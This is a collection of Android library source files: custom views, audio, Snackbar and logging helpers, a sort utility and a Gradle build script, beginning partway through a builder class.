        public Builder setMaskAnchorId(int maskAnchorId) {
            this.maskAnchorId = maskAnchorId;
            return this;
        }

        public Hint build() {
            return new Hint(this);
        }
    }
}<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.support.v4.view.ViewPager;
import android.util.AttributeSet;
import android.view.MotionEvent;
/**
 * Created by Cenler - 2015/3/26.
 * Description: a ViewPager whose touch handling can be switched off entirely;
 * swiping stays disabled until setPagingEnabled(true) is called.
 */
public class NoSwipeViewPager extends ViewPager {

    /** Whether swipe gestures are honored; disabled by default. */
    private boolean mEnabled = false;

    public NoSwipeViewPager(Context context, AttributeSet attrs) {
        super(context, attrs);
    }

    @Override
    public boolean onTouchEvent(MotionEvent ev) {
        // Short-circuit: when disabled, the event is neither handled nor
        // forwarded to the ViewPager implementation.
        return mEnabled && super.onTouchEvent(ev);
    }

    @Override
    public boolean onInterceptTouchEvent(MotionEvent ev) {
        return mEnabled && super.onInterceptTouchEvent(ev);
    }

    /**
     * Enables or disables swipe paging on this control.
     *
     * @param enabled true to allow swiping between pages
     */
    public void setPagingEnabled(boolean enabled) {
        this.mEnabled = enabled;
    }
}
<file_sep>package com.icenler.lib.utils.manager;
import android.support.design.widget.Snackbar;
import android.view.ViewGroup;
/**
 * Created by iCenler - 2015/7/15.
 * Description: global Snackbar helper.
 * 1. works with CoordinatorLayout for swipe-to-dismiss
 * 2. TODO: extend with further overloads as needed
 */
public class SnackbarManager {

    private SnackbarManager() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /** Shows a long-duration Snackbar attached to {@code parent}. */
    public static void show(ViewGroup parent, String msg) {
        Snackbar bar = Snackbar.make(parent, msg, Snackbar.LENGTH_LONG);
        bar.show();
    }

    /** String-resource overload: resolves the text and delegates. */
    public static void show(ViewGroup parent, int strRes) {
        String msg = parent.getContext().getString(strRes);
        show(parent, msg);
    }
}
<file_sep>package com.icenler.lib.utils.manager;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.media.AudioManager;
import android.media.MediaPlayer;
import android.net.Uri;
import android.os.Build;
import com.icenler.lib.feature.App;
import java.io.IOException;
/**
 * Created by iCenler - 2015/10/8.
 * Description: music playback manager
 * (requires permission android.permission.MODIFY_AUDIO_SETTINGS).
 */
public class PlayerManager {
    // volatile is required for double-checked locking to publish the instance safely.
    private static volatile PlayerManager playerManager;
    private Context context;
    private MediaPlayer mediaPlayer;
    private AudioManager audioManager;
    private PlayCallback callback;
    private String filePath;

    /**
     * @return the lazily created, process-wide singleton instance
     */
    public static PlayerManager getManager() {
        if (playerManager == null) {
            synchronized (PlayerManager.class) {
                // FIX: re-check inside the lock. The original created a new
                // instance unconditionally here, so two racing threads could
                // each replace the singleton.
                if (playerManager == null) {
                    playerManager = new PlayerManager();
                }
            }
        }
        return playerManager;
    }

    private PlayerManager() {
        this.context = App.getInstance();
        mediaPlayer = new MediaPlayer();
        audioManager = (AudioManager) context.getSystemService(Context.AUDIO_SERVICE);
    }

    /**
     * Playback lifecycle callbacks.
     */
    public interface PlayCallback {
        /**
         * The media source is prepared; playback is about to start.
         */
        void onPrepared();
        /**
         * Playback reached the end of the source.
         */
        void onComplete();
        /**
         * Playback was stopped via {@link #stop()}.
         */
        void onStop();
    }

    /**
     * Plays a music file.
     *
     * @param path     path/URI of the audio file
     * @param callback playback callback
     */
    public void play(String path, final PlayCallback callback) {
        this.filePath = path;
        this.callback = callback;
        try {
            mediaPlayer.reset();
            mediaPlayer.setDataSource(context, Uri.parse(path));
            // FIX: register the listener BEFORE preparing and prepare
            // asynchronously. Per the MediaPlayer documentation, onPrepared is
            // delivered (via prepareAsync) only to a listener registered
            // beforehand; the original registered it after a synchronous
            // prepare(), so the callback never fired and start() was never reached.
            mediaPlayer.setOnPreparedListener(new MediaPlayer.OnPreparedListener() {
                @Override
                public void onPrepared(MediaPlayer mp) {
                    callback.onPrepared();
                    mediaPlayer.start();
                }
            });
            mediaPlayer.prepareAsync();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * Stops playback if currently playing and notifies the callback.
     */
    public void stop() {
        if (isPlaying()) {
            try {
                mediaPlayer.stop();
                callback.onStop();
            } catch (IllegalStateException e) {
                e.printStackTrace();
            }
        }
    }

    /**
     * @return true while the player is actively playing
     */
    public boolean isPlaying() {
        return mediaPlayer != null && mediaPlayer.isPlaying();
    }

    /**
     * Routes audio to the loudspeaker.
     */
    public void changeToSpeaker() {
        audioManager.setMode(AudioManager.MODE_NORMAL);
        audioManager.setSpeakerphoneOn(true);
    }

    /**
     * Routes audio to a wired headset.
     */
    public void changeToHeadset() {
        audioManager.setSpeakerphoneOn(false);
    }

    /**
     * Routes audio to the earpiece (in-call receiver).
     */
    public void changeToReceiver() {
        audioManager.setSpeakerphoneOn(false);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
            audioManager.setMode(AudioManager.MODE_IN_COMMUNICATION);
        } else {
            audioManager.setMode(AudioManager.MODE_IN_CALL);
        }
    }

    /**
     * Raises the music stream volume by one step (up to the stream maximum).
     */
    public void raiseVolume() {
        int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
        if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC)) {
            audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
                    AudioManager.ADJUST_RAISE, AudioManager.FX_FOCUS_NAVIGATION_UP);
        }
    }

    /**
     * Lowers the music stream volume by one step (down to zero).
     */
    public void lowerVolume() {
        int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
        // FIX: the original guard compared against the stream MAXIMUM (a
        // copy-paste of raiseVolume), which skipped lowering exactly when the
        // volume was at max. Lower only while above zero instead.
        if (currentVolume > 0) {
            audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
                    AudioManager.ADJUST_LOWER, AudioManager.FX_FOCUS_NAVIGATION_UP);
        }
    }

    /**
     * Receiver for wired-headset plug/unplug events; switches the audio route.
     */
    class HeadsetReceiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            String action = intent.getAction();
            switch (action) {
                // Fired when a wired headset is plugged in or pulled out.
                case Intent.ACTION_HEADSET_PLUG:
                    int state = intent.getIntExtra("state", 0);
                    if (state == 1) {
                        playerManager.changeToHeadset();
                    } else if (state == 0) {
                        playerManager.changeToSpeaker();
                    }
                    break;
                default:
                    break;
            }
        }
    }
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.graphics.Canvas;
import android.os.Build;
import android.text.Layout;
import android.text.StaticLayout;
import android.text.TextPaint;
import android.text.TextUtils;
import android.util.AttributeSet;
import android.widget.Scroller;
import android.widget.TextView;
import java.util.ArrayList;
/**
 * Created by iCenler - 2016/7/5.
 * Description: TextView that animates digit columns scrolling/dropping into place.
 */
public class AnimTextView extends TextView {
    private float mFold = 1.3f;// duration multiplier applied to each successive column
    private float mW;// width of a single digit column
    private float mSpacingMulti = 1.0f;// StaticLayout line-spacing multiplier (1.0 = normal)
    private int mLayoutH;// height of a column's StaticLayout (the scroll distance)
    private int mAddMax = 3;// increment animation: how many successive +1 digits to append
    private ArrayList<String> mStrList = new ArrayList<String>();// generated per-column strings
    private ArrayList<Scroller> mScrList = new ArrayList<Scroller>();// per-column scrollers
    private ArrayList<StaticLayout> mLayoutList = new ArrayList<StaticLayout>();// per-column layouts used for drawing
    public AnimTextView(Context context) {
        super(context);
    }
    public AnimTextView(Context context, AttributeSet attrs) {
        super(context, attrs);
    }
    public AnimTextView(Context context, AttributeSet attrs, int defStyleAttr) {
        super(context, attrs, defStyleAttr);
    }
    /**
     * Starts the animation replacing the old value with the new one.
     *
     * @param oldNum the previous value
     * @param newNum the new value (also becomes the TextView's text)
     */
    public void setText(String oldNum, String newNum) {
        super.setText(newNum);
        if (TextUtils.isEmpty(oldNum) || TextUtils.isEmpty(newNum)) {
            return;
        }
        clearList();
        // NOTE(review): the arguments are passed in the opposite order of
        // makeUnequalData's parameter names (oldNum/newNum). Since each column's
        // final frame shows the FIRST line of its two-line layout (see onDraw),
        // this swap may be intentional so the NEW value ends up displayed —
        // confirm before "fixing".
        makeUnequalData(newNum, oldNum);
    }
    // Builds one two-line string per digit column, walking both numbers from
    // their least-significant ends and padding the shorter one with '0'.
    private void makeUnequalData(String oldNum, String newNum) {
        StringBuilder sb = new StringBuilder();
        int l1 = oldNum.length() - 1;
        int l2 = newNum.length() - 1;
        for (; l1 > -1 || l2 > -1; --l1, --l2) {
            sb.setLength(0);
            mStrList.add(0, sb.append(l1 > -1 ? oldNum.charAt(l1) : '0').append("\n").append(l2 > -1 ? newNum.charAt(l2) : '0').toString());
        }
    }
    /**
     * Starts the increment animation.
     * Example: for "528" three column strings are generated:
     * "5\n6\n7\n8", "2\n3\n4\n5", "8\n9\n0\n1" — each column is a run of
     * +1-incremented digits, mAddMax entries long.
     * NOTE(review): the isAnim parameter is currently unused.
     */
    public void setText(String content, boolean isAnim) {
        super.setText(content);
        clearList();
        for (int i = 0; i < content.length(); i++) {
            char c = content.charAt(i);
            makeData(Integer.parseInt(c + ""));
        }
    }
    // Builds a StaticLayout and a Scroller per column; each later column's
    // scroll duration grows by the mFold factor for a staggered effect.
    public void startAnim() {
        if (mStrList.size() == 0) return;
        int mDur = 1500;// base duration for the first column
        float x = 1 + (mStrList.size() * 0.06f < 0.1 ? 0 : mStrList.size() * 0.06f);
        x = x > 1.30f ? 1.30f : x;
        mW = (getWidth() / mStrList.size()) * x;
        mLayoutH = 0;
        TextPaint p = getPaint();
        p.setColor(getCurrentTextColor());
        for (int i = 0; i < mStrList.size(); i++) {
            if (!TextUtils.isEmpty(mStrList.get(i))) {
                StaticLayout layout = new StaticLayout(mStrList.get(i), p, (int) mW, Layout.Alignment.ALIGN_CENTER, mSpacingMulti, 0.0F, true);
                mLayoutList.add(layout);
                Scroller scroller = new Scroller(getContext());
                mLayoutH = layout.getHeight();
                scroller.startScroll(0, -mLayoutH, 0, mLayoutH, mDur);
                mScrList.add(scroller);
                mDur = (int) (mDur * mFold);
            }
        }
    }
    // Resets all per-column animation state.
    private void clearList() {
        mStrList.clear();
        mScrList.clear();
        mLayoutList.clear();
    }
    // Report the size from the text metrics + include-pad (prevents a large
    // background image from dictating the measured size).
    @Override
    protected int getSuggestedMinimumHeight() {
        return Build.VERSION.SDK_INT > 16 ? getMinimumHeight() : 0;
    }
    @Override
    protected int getSuggestedMinimumWidth() {
        return Build.VERSION.SDK_INT > 16 ? getMinimumWidth() : 0;
    }
    // Builds one increment-animation column string starting at the given digit,
    // appending mAddMax successive digits with wrap-around after 9.
    private void makeData(int data) {
        StringBuilder sb = new StringBuilder();
        sb.append(data);
        for (int i = 1; i <= mAddMax; i++) {
            int num = data + i;
            if (num > 9) num = num % 10;
            sb.append("\n" + num);
        }
        mStrList.add(sb.toString());
    }
    private String mLast = null;// last text seen by onDraw; a change (re)starts the animation
    @Override
    protected void onDraw(Canvas canvas) {
        CharSequence str = getText();
        if (str == null) return;
        // NOTE(review): this is a REFERENCE comparison between the CharSequence
        // returned by getText() and the cached String; it relies on setText
        // producing a new object to trigger a restart — confirm this is intended.
        if (str != mLast) {
            mLast = str.toString();
            startAnim();
            postInvalidate();
            return;
        }
        if (mStrList.size() == 0 || mScrList.size() == 0 || mLayoutList.size() == 0) {
            super.onDraw(canvas);
            return;
        }
        try {
            boolean invalidate = false;
            for (int i = 0; i < mStrList.size(); i++) {
                canvas.save();
                canvas.translate(i * 3 * mW / 4, 0);// columns are packed at 3/4 of a column width
                Scroller scroller = mScrList.get(i);
                if (scroller != null && scroller.computeScrollOffset()) {
                    canvas.translate(0, scroller.getCurrY());
                    invalidate = true;// keep animating while any scroller is active
                }
                StaticLayout layout = mLayoutList.get(i);
                if (layout != null) layout.draw(canvas);
                canvas.restore();
            }
            if (invalidate) postInvalidate();
        } catch (Exception e) {
            e.printStackTrace();
        }
        //super.onDraw(canvas);
    }
    /** Forces the next onDraw to restart the animation. */
    public void clearLast() {
        mLast = null;
    }
}
<file_sep>package com.icenler.lib.utils;
import android.text.TextUtils;
import android.util.Log;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.io.File;
/**
* Created by iCenler - 2015/7/15.
* Description:Log 工具
* 1、TAG 自动产生,格式: customTagPrefix:className.methodName(L:lineNumber),
* 2、customTagPrefix 为空时只输出:className.methodName(L:lineNumber)
* 3、通过设置日志等级标记位控制是否输出
*/
public class LogUtil {
/** Static utility class — not instantiable. */
private LogUtil() {
    throw new UnsupportedOperationException("cannot be instantiated");
}
// Prefix prepended to every generated tag; empty disables the prefix part.
static String customTagPrefix = "iCenler";
// Per-level switches controlling whether each level is output.
static boolean allowD = true;// Debug
static boolean allowE = true;// Error
static boolean allowI = true;// Info
static boolean allowV = true;// Verbose
static boolean allowW = true;// Warn
static boolean allowWtf = true;// what a terrible failure
// Master switch: when false, the static block below silences every level.
private static boolean CONTROL_SWITCH = true;
static {
    if (!CONTROL_SWITCH) {
        allowD = allowE = allowI = allowV = allowW = allowWtf = false;
    }
}
/**
 * Optional output extension: when set, all log output is routed through this
 * delegate instead of android.util.Log. Implement CustomLogger to customize.
 */
public static CustomLogger customLogger;
public static void setCustomLogger(CustomLogger logger) {
    customLogger = logger;
}
/**
 * Delegate interface mirroring android.util.Log's level methods; install an
 * implementation via setCustomLogger to take over all LogUtil output.
 */
public interface CustomLogger {
    void d(String tag, String content);
    void d(String tag, String content, Throwable tr);
    void e(String tag, String content);
    void e(String tag, String content, Throwable tr);
    void i(String tag, String content);
    void i(String tag, String content, Throwable tr);
    void v(String tag, String content);
    void v(String tag, String content, Throwable tr);
    void w(String tag, String content);
    void w(String tag, String content, Throwable tr);
    void w(String tag, Throwable tr);
    void wtf(String tag, String content);
    void wtf(String tag, String content, Throwable tr);
    void wtf(String tag, Throwable tr);
}
/**
 * Builds the log tag for a caller's stack frame, formatted as
 * "prefix:ClassName.methodName(L:lineNumber)"; the prefix and its colon are
 * omitted when customTagPrefix is empty.
 */
private static String generateTag(StackTraceElement caller) {
    String simpleName = caller.getClassName();
    simpleName = simpleName.substring(simpleName.lastIndexOf(".") + 1);
    String tag = String.format("%s.%s(L:%d)", simpleName, caller.getMethodName(), caller.getLineNumber());
    return TextUtils.isEmpty(customTagPrefix) ? tag : customTagPrefix + ":" + tag;
}
/** Logs at DEBUG level; no-op when allowD is false. */
public static void d(String content) {
    if (!allowD) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.d(tag, String.valueOf(content));
    } else {
        Log.d(tag, String.valueOf(content));
    }
}
/** Logs at DEBUG level with an attached throwable; no-op when allowD is false. */
public static void d(String content, Throwable tr) {
    if (!allowD) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.d(tag, String.valueOf(content), tr);
    } else {
        Log.d(tag, String.valueOf(content), tr);
    }
}
/** Logs at ERROR level; no-op when allowE is false. */
public static void e(String content) {
    if (!allowE) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.e(tag, String.valueOf(content));
    } else {
        Log.e(tag, String.valueOf(content));
    }
}
/** Logs at ERROR level with an attached throwable; no-op when allowE is false. */
public static void e(String content, Throwable tr) {
    if (!allowE) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.e(tag, String.valueOf(content), tr);
    } else {
        Log.e(tag, String.valueOf(content), tr);
    }
}
/** Logs at INFO level; no-op when allowI is false. */
public static void i(String content) {
    if (!allowI) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.i(tag, String.valueOf(content));
    } else {
        Log.i(tag, String.valueOf(content));
    }
}
/** Logs at INFO level with an attached throwable; no-op when allowI is false. */
public static void i(String content, Throwable tr) {
    if (!allowI) return;
    StackTraceElement caller = getCallerStackTraceElement();
    String tag = generateTag(caller);
    if (customLogger != null) {
        customLogger.i(tag, String.valueOf(content), tr);
    } else {
        Log.i(tag, String.valueOf(content), tr);
    }
}
public static void v(String content) {
if (!allowV) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.v(tag, String.valueOf(content));
} else {
Log.v(tag, String.valueOf(content));
}
}
/** Logs {@code content} plus a throwable at VERBOSE level; no-op unless {@code allowV} is enabled. */
public static void v(String content, Throwable tr) {
    if (allowV) {
        final String tag = generateTag(getCallerStackTraceElement());
        final String msg = String.valueOf(content);
        if (customLogger == null) {
            Log.v(tag, msg, tr);
        } else {
            customLogger.v(tag, msg, tr);
        }
    }
}
/** Logs {@code content} at WARN level; no-op unless {@code allowW} is enabled. */
public static void w(String content) {
    if (allowW) {
        final String tag = generateTag(getCallerStackTraceElement());
        final String msg = String.valueOf(content);
        if (customLogger == null) {
            Log.w(tag, msg);
        } else {
            customLogger.w(tag, msg);
        }
    }
}
/** Logs {@code content} plus a throwable at WARN level; no-op unless {@code allowW} is enabled. */
public static void w(String content, Throwable tr) {
    if (allowW) {
        final String tag = generateTag(getCallerStackTraceElement());
        final String msg = String.valueOf(content);
        if (customLogger == null) {
            Log.w(tag, msg, tr);
        } else {
            customLogger.w(tag, msg, tr);
        }
    }
}
/** Logs a bare throwable at WARN level; no-op unless {@code allowW} is enabled. */
public static void w(Throwable tr) {
    if (allowW) {
        final String tag = generateTag(getCallerStackTraceElement());
        if (customLogger == null) {
            Log.w(tag, tr);
        } else {
            customLogger.w(tag, tr);
        }
    }
}
/** Logs {@code content} at ASSERT ("what a terrible failure") level; no-op unless {@code allowWtf} is enabled. */
public static void wtf(String content) {
    if (allowWtf) {
        final String tag = generateTag(getCallerStackTraceElement());
        final String msg = String.valueOf(content);
        if (customLogger == null) {
            Log.wtf(tag, msg);
        } else {
            customLogger.wtf(tag, msg);
        }
    }
}
/** Logs {@code content} plus a throwable at ASSERT level; no-op unless {@code allowWtf} is enabled. */
public static void wtf(String content, Throwable tr) {
    if (allowWtf) {
        final String tag = generateTag(getCallerStackTraceElement());
        final String msg = String.valueOf(content);
        if (customLogger == null) {
            Log.wtf(tag, msg, tr);
        } else {
            customLogger.wtf(tag, msg, tr);
        }
    }
}
/** Logs a bare throwable at ASSERT level; no-op unless {@code allowWtf} is enabled. */
public static void wtf(Throwable tr) {
    if (allowWtf) {
        final String tag = generateTag(getCallerStackTraceElement());
        if (customLogger == null) {
            Log.wtf(tag, tr);
        } else {
            customLogger.wtf(tag, tr);
        }
    }
}
/**
 * Pretty-prints a JSON string to the DEBUG log, framed by box-drawing rules.
 * Accepts either a JSON object ("{...}") or array ("[...]"); anything else is
 * reported via {@link #e(String, Throwable)}. No-op unless {@code allowD} is enabled.
 *
 * @param content raw JSON text
 */
public static void json(String content) {
    if (!allowD) return;
    String message = null;
    try {
        if (content.startsWith("{")) {
            JSONObject jsonObject = new JSONObject(content);
            message = jsonObject.toString(4);
        } else if (content.startsWith("[")) {
            JSONArray jsonArray = new JSONArray(content);
            message = jsonArray.toString(4);
        } else {
            throw new JSONException("Invalid Json data");
        }
    } catch (JSONException e) {
        e("Invalid Json data", e);
        return;
    }
    String tag = generateTag(getCallerStackTraceElement());
    Log.d(tag, "╔═══════════════════════════════════════════════════════════════════════════════════════");
    // BUG FIX: the original split/joined on File.separator ("/" on Android), which is a
    // path separator, not a line separator — it mangled the pretty-printed output.
    String[] lines = message.split("\n");
    StringBuilder jsonContent = new StringBuilder();
    for (String line : lines)
        jsonContent.append("║ ").append(line).append("\n");
    Log.d(tag, jsonContent.toString());
    Log.d(tag, "╚═══════════════════════════════════════════════════════════════════════════════════════");
}
/**
 * StackTraceElement reference:
 * String getClassName()  - fully-qualified class name of the execution point.
 * String getFileName()   - source file name of the execution point.
 * int getLineNumber()    - source line number of the execution point.
 * String getMethodName() - method name of the execution point.
 * String toString()      - string form of the element.
 *
 * @return the stack frame of the code that called into this logger.
 *         Index 4 skips: VM frames, getStackTrace itself, this method, and the
 *         public log method — the depth is fixed, so this must only ever be
 *         called directly from the public d/e/i/v/w/wtf/json entry points.
 */
public static StackTraceElement getCallerStackTraceElement() {
    return Thread.currentThread().getStackTrace()[4];
}
/**
 * @return the stack frame of the method that calls this one directly
 *         (index 3 skips VM frames, getStackTrace, and this method).
 */
public static StackTraceElement getCurrentStackTraceElement() {
    return Thread.currentThread().getStackTrace()[3];
}
}
<file_sep>package com.icenler.lib.view.widget;
import android.app.Activity;
import android.content.Context;
import android.util.AttributeSet;
import android.view.View;
import android.widget.ImageButton;
/**
 * Created by Cenler - 2015/3/26
 * Description: an ImageButton that finishes its hosting Activity when clicked
 * (i.e. a ready-made "back" button).
 */
public class BackImgButton extends ImageButton {

    public BackImgButton(Context context) {
        super(context);
        initView();
    }

    public BackImgButton(Context context, AttributeSet attrs) {
        super(context, attrs);
        initView();
    }

    public BackImgButton(Context context, AttributeSet attrs, int defStyle) {
        super(context, attrs, defStyle);
        initView();
    }

    /** Installs the click handler that finishes the enclosing Activity, if there is one. */
    private void initView() {
        setOnClickListener(new OnClickListener() {
            @Override
            public void onClick(View v) {
                final Context host = getContext();
                if (host instanceof Activity) {
                    ((Activity) host).finish();
                }
            }
        });
    }
}
<file_sep>package com.icenler.lib.utils;
import java.lang.reflect.Method;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
/**
* Created by iCenler - 2015/7/13.
* Description: 排序相关工具类
*/
public class SortUtil {
public static final int COMPARE_TYPE_STRING = 0;
public static final int COMPARE_TYPE_INT = 1;
public static final int COMPARE_TYPE_LONG = 2;
private static <T> int doCompare(final String method, final Class[] methodArgsClass,
final Object[] methodArgs, final String order, Object object1, Object object2,
int compareType, boolean ignoreCharType) {
int result = 0;
try {
Method compareMethod1 = object1.getClass().getMethod(method, methodArgsClass);
Method compareMethod2 = object2.getClass().getMethod(method, methodArgsClass);
if (null == compareMethod1.invoke(object1, methodArgs) || null == compareMethod2.invoke(object2, methodArgs)) {
return result;
}
if (compareType == COMPARE_TYPE_INT) {
//按int类型比较
int value1 = (Integer) compareMethod1.invoke(object1, methodArgs);
int value2 = (Integer) compareMethod1.invoke(object2, methodArgs);
if (value1 == value2) {
return result = 0;
}
if (order != null && "DESC".equals(order)) {
result = value2 > value1 ? 1 : -1;
} else {
result = value1 > value2 ? 1 : -1;
}
} else if (compareType == COMPARE_TYPE_LONG) {
//按long类型比较
long value1 = (Long) compareMethod1.invoke(object1, methodArgs);
long value2 = (Long) compareMethod1.invoke(object2, methodArgs);
if (value1 == value2) {
return result = 0;
}
if (order != null && "DESC".equals(order)) {
result = value2 > value1 ? 1 : -1;
} else {
result = value1 > value2 ? 1 : -1;
}
} else if (compareType == COMPARE_TYPE_STRING) {
//按long类型比较
String value1 = (String) compareMethod1.invoke(object1, methodArgs);
String value2 = (String) compareMethod1.invoke(object2, methodArgs);
if (value1 != null && value2 != null) {
if (!ignoreCharType) {
return compareString(value1, value2);
} else {
return value1.compareTo(value2);
}
}
}
} catch (Exception e) {
e.printStackTrace();
}
return result;
}
private static int compareString(String oneString, String anotherString) {
int len1 = oneString.length();
int len2 = anotherString.length();
int lim = Math.min(len1, len2);
char v1[] = oneString.toCharArray();
char v2[] = anotherString.toCharArray();
int k = 0;
while (k < lim) {
char c1 = v1[k];
char c2 = v2[k];
//如果是英文,则排在前面
if (isLetter(c1) && !isLetter(c2)) {
return -1;
}
//如果是数字,则排在前面
if (isNumeric(c1) && !isNumeric(c2)) {
//第二个是英文,英文排在前面
if (isLetter(c2)) {
return 1;
} else {//其他情况,数字排在前面
return -1;
}
}
//如果是中文(非数字),则排在前面
if (isChinese(c1) && !isChinese(c2)) {
if (isLetter(c2) || isNumeric(c2)) {
return 1;
} else {
return -1;
}
}
if (c1 != c2) {
return c1 - c2;
}
k++;
}
return len1 - len2;
}
private static <T> int doCompare(final String method, final Class[] methodArgsClass,
final Object[] methodArgs, final String order, Object object1, Object object2,
int compareType) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, compareType, false);
}
// 是否是英文
private static boolean isLetter(char c) {
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
// 是否是数字
private static boolean isNumeric(char c) {
return Character.isDigit(c);
}
// 是否是中文
private static boolean isChinese(char key) {
return (key >= 0x4e00 && key <= 0x9fa5) ? true : false;
}
public static <T> void sortByString(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_STRING, true);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
public static <T> void sortByStringCritical(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_STRING, false);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
@SuppressWarnings("unchecked")
public static <T> void sortByInteger(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
// 宽松汉字拼音排序
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_INT);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
}
<file_sep>// Android 程序申明
apply plugin: 'com.android.application'
// Android build configuration
android {
// SDK level to compile against
compileSdkVersion 23
// Build-tools version
buildToolsVersion '23.0.1'
// Application id and version information
defaultConfig {
applicationId "com.icenler.lib"
minSdkVersion 19
targetSdkVersion 23
versionCode 1
versionName "1.0.0"
}
// Java source/target language level
compileOptions {
sourceCompatibility JavaVersion.VERSION_1_7
targetCompatibility JavaVersion.VERSION_1_7
}
signingConfigs {
debug { /* No debug config*/ }
release {
// storeFile file("../key/*.keystore")
// storePassword ""
// keyAlias ""
// keyPassword ""
}
}
// Build-type configuration (e.g. obfuscation)
buildTypes {
debug {}
release {
// // Disable logging in release builds
// buildConfigField "boolean", "LOG_DEBUG", "false"
//
// minifyEnabled true // enable obfuscation
// zipAlignEnabled true
// shrinkResources true // strip unused resources
// signingConfig signingConfigs.release
// ProGuard configuration files
proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
}
}
// Ignore Lint errors during build
// lintOptions {
// abortOnError false
// }
}
// Module dependencies
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
compile 'com.android.support:support-v4:23.0.1'
// compile 'com.android.support:appcompat-v7:23.0.1'
compile 'com.android.support:design:23.3.0' // supports app:layout_scrollFlags="snap"
// compile 'com.android.support:design:23.0.1'
compile 'com.android.support:recyclerview-v7:23.0.1'
compile 'com.android.support:cardview-v7:23.0.1'
compile 'com.android.support:palette-v7:23.0.1'
// Utilities
compile 'org.xutils:xutils:3.3.36'
compile 'com.google.code.gson:gson:2.3.1'
compile 'com.alibaba:fastjson:1.2.9'
compile 'com.nineoldandroids:library:2.4.0'
compile 'com.jakewharton:butterknife:8.4.0'
annotationProcessor 'com.jakewharton:butterknife-compiler:8.4.0'
compile 'com.zhy:percent-support-extends:1.0.6'
compile 'de.greenrobot:eventbus:2.4.0'
compile 'io.reactivex:rxandroid:1.0.1'
compile 'io.reactivex:rxjava:1.0.14'
compile 'com.anupcowkur:reservoir:3.0.0'
// Networking
compile 'com.squareup.okhttp:okhttp:2.4.0'
compile 'com.squareup.retrofit2:retrofit:2.1.0'
compile 'com.mcxiaoke.volley:library:1.0.19'
// Images
compile 'com.facebook.fresco:fresco:0.8.1+'
compile 'com.squareup.picasso:picasso:2.5.2'
compile 'com.github.bumptech.glide:glide:3.7.0'
compile 'com.nostra13.universalimageloader:universal-image-loader:1.9.5'
// Umeng analytics (Gradle packaging)
// compile 'com.umeng.analytics:analytics:latest.integration'
// Auto layout
// compile 'com.zhy:autolayout:1.3.4'
// compile 'com.android.support:percent:22.2.0'
// RxJava-based view binding and related extensions
compile 'com.jakewharton.rxbinding:rxbinding:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-support-v4:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-appcompat-v7:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-design:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-recyclerview-v7:0.2.0'
// compile 'com.trello:rxlifecycle:1.0'
// If you want to bind to Android-specific lifecycles
// compile 'com.trello:rxlifecycle-android:1.0'
// Glide image-loading framework
// compile 'com.github.bumptech.glide:glide:3.7.0'
// compile 'jp.wasabeef:glide-transformations:1.4.0'
// compile 'jp.co.cyberagent.android.gpuimage:gpuimage-library:1.3.0'// If you want to use the GPU Filters
// compile 'com.github.bumptech.glide:okhttp-integration:1.3.1@aar'// OkHttp network integration
// compile 'com.github.bumptech.glide:volley-integration:1.3.1@aar'// Volley network integration
// compile 'com.github.chrisbanes.photoview:library:1.2.4' // photo viewer widget
// compile 'com.baoyz.swipemenulistview:library:1.3.0' // ListView item swipe menu
// compile 'com.crashlytics.android:crashlytics:1.+' // crash reporting
// compile 'cn.pedant.sweetalert:library:1.3' // dialog
// compile 'com.almeros.android-gesture-detectors:library:1.0' // gesture detection
// compile 'me.imid.swipebacklayout.lib:library:1.0.0' // iOS-style swipe back
// compile 'com.moxun:tagcloudlib:1.0.3' // 3D scrolling tag-cloud view
// compile 'io.github.yavski:fab-speed-dial:1.0.2' // FloatingActionButton extension
